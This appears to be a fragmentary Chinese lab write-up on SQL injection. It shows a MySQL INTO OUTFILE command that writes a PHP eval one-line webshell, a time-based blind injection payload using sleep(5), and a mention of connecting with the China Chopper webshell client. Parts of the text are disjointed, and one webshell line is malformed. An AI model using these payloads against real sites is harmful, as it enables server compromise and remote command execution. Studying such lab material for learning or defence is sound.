首先我们介绍一个sql命令
Select ‘<?php@eval($_GET[‘cmd’])?>’ into outfile “f://123.php”
这句是myslq向外导出文件,这样就可以导出一句话木马了。
插嘴一句 php加密与解密的问题自己看看去吧
https://www.waitalone.cn/eval-gzinflate-base64_decode-decryption.html
发现我无论双引号单引号括号及sleep好像没啥用。持续懵逼。。。。。。。。。。。。。。
但是反斜杠会显错 加上--+后有没有反应了。但是我们根据报错好像发现是单引号而且有两个括号 ,so, 发现?id=1’)) and sleep(5)--+成功执行
通过url导入文件发现我的sql好像是禁止了这个功能。。所以告辞
解释个语句
多说一句
那我们假设我们已经上传了这个一句话。
菜刀连接我们就不介绍了,网上遍地都是。
假设我们把下面这句放到了当前目录命名为1.php
<?php eval(_GET[cmd])?>
发现啥也没有
有东西了 等等东西吧